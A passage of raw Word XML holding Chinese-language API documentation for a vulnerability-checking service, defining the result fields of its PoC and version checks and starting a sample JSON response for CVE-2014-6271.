          <w:p w14:paraId="4F182BA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32EA5516" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2552F9E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B49B54F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BD7FD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DE9440" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结果详情数组，vuls下是一个Map组成的list，用于渲染检测结果模板，各个检测项返回的结果包含的字段不同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E5F9859" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62CEEDCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3785D63F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247903A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518D2209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行错误时错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24646972" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>poc_check_result下vuls数据结构--常见字段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1032"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4806"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1386070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B2E0F75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7113DB8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21DAF7E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68655BF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C545202" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C82110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A918E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392D8207" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E2293A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>该检查项在脚本中的排序id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F0473FC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DB22EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D76583" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405E521E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D8128BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否受漏洞影响，1或true表示受漏洞影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0597B7CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E273AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulnmsg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="327C6141" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68ABD74C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236F72E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测结果从内存得到的内容，msg中包含的木板变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68EC11FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2872E993" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B77656C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7AC2D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16918D72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回的人类可读结构，可读的检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C1A35D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437B5DB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC64B61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4846C0A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D59763F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测点标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2490429D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ver_check_result数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="751"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5F497D7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D583BC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFA2AB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34459E20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCFFDD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36873AC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215E2035" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33066806" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17D16EB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58906533" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0 表示不受影响，1表示受影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A2DFAB3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE5E729" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE20310" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B9C3754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63038C65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DAEE223" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F7701A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F9495CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="624392CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55634DDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结果详情，见 ver_check_result 下vuls数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05406A59" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1926442A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C11C4DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00BA48AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0582C807" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行错误时错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="133C80FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ver_check_result下vuls数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1236"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6EBD04A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32CCA92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3863F996" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6AD252" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13138409" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B122CD5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6467EA55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0195A84F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6566819D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2887569A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16918285" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334ECDE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fix_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713D1D28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5094815D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C33B41C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D3BF848" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6748F4F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74EAA0F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682DF985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46CA62C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60B0BE64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784F32B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "execute_type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cve_id": "CVE-2014-6271",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "poc_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "host_id": "e807ecef881e17f7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ver_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
